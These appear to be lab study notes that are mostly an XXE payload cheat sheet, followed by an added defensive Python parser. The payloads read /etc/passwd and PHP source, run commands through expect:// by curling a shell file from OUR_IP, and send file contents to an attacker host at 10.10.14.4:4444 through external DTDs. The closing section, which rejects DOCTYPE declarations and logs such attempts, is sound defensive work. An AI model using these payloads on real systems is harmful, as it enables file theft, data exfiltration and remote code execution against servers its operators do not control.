XXE

LFI

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

LFI Encoded

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

RCE

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

CDATA Exfiltration

enyei@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
enyei@htb[/htb]$ python3 -m http.server 8000

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
<root>
<name></name>
<tel></tel>
<email>&joined;</email>
<message></message>
</root>

Error Based XXE

  • Host this external DTD on our server as xxe.dtd, then reference it from the DOCTYPE of the request

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % oob "<!ENTITY &#x25; content SYSTEM 'http://10.10.14.4:4444/?content=%file;'>">
%oob;
%content;

<?xml version="1.0"?>
<!DOCTYPE email [<!ENTITY % remote SYSTEM "http://10.10.14.4:4444/xxe.dtd"> %remote;]>
<root>
<name></name>
<tel></tel>
<email>&content;</email>
<message></message>
</root>
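Added defensive example (not part of the original notes): every payload on this page, from the plain file read to the external-DTD variants, needs a <!DOCTYPE> to declare its entities, so a parser that refuses DTDs outright blocks all of them. This uses only the standard library's expat binding; the two sample documents are constructed, the first being the page's first payload.

```python
import xml.parsers.expat

# Constructed sample: the page's first payload (an external entity that reads a local file).
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
<root><name></name><tel></tel><email>&company;</email><message></message></root>"""

# Constructed sample: a normal submission, which carries no DOCTYPE at all.
BENIGN = """<?xml version="1.0"?>
<root><name>Ann</name><tel>123</tel><email>ann@example.com</email><message>hi</message></root>"""

class DoctypeRejected(ValueError):
    """Raised as soon as the input declares a DOCTYPE or an entity."""

def parse_fields(xml_text):
    """Parse the form XML into {tag: text}, refusing any DTD. Every payload above
    needs a <!DOCTYPE> to declare its entities (file://, php://filter, expect://,
    external DTDs), so rejecting the DOCTYPE up front blocks all of them at once."""
    parser = xml.parsers.expat.ParserCreate()
    fields, stack = {}, []
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE declarations are not accepted")
    def on_entity_decl(*_):
        raise DoctypeRejected("entity declarations are not accepted")
    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")
    def chars(data):
        if stack:  # ignore whitespace outside the document element
            fields[stack[-1]] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = lambda *_: 0  # defence in depth: never fetch, abort
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return fields

def rejects(xml_text):
    """True when the parser refuses the document because it carries a DTD."""
    try:
        parse_fields(xml_text)
    except DoctypeRejected:
        return True
    return False
```

Logging the DoctypeRejected exception with the source address gives a cheap detection signal as well, since legitimate clients of such a form never send a DOCTYPE.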
